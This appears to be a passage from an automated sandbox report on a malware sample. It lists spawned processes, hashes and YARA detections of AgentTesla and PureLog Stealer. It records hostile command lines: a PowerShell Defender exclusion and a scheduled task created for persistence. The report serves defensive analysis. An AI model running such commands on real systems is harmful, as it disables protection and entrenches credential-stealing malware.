                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:25
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1782700008.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:25
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:27
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:1E467BDA5911F0899BC6AC04CDE8ACA5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:28
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:28
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xf90000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:28
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:28
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:33
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:33
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:33
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:33
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:6341995A4613FCE6AD6219013E4B7646
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6616b0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:39
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'239'552 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:42
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:42
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1814740153.0000000005700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1807691329.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.1810974592.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:43
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x600000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:48
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'239'552 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:51
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.5%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:31.9%
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:852
                                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:21
